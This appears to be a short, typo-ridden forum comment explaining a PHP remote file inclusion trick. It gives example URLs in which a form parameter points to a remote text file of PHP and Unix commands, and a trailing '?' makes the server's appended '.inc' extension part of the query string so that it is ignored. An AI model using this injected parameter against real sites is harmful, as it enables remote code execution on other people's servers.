if someone icluded a file from a remote website followed by ? it it wll completely igonre anything after they dangerous code for example http://www.wickham43.com/test/php-show-form.phpf=http://s.rr/php_with_some_unix_commands.txt? it will be http://www.wickham43.com/test/php-show-form.php?f=http://h.sr/php_with_some_unix_commands.txt?.inc and everything after ? is ignored so your .inc is will be treated as a part of the query string.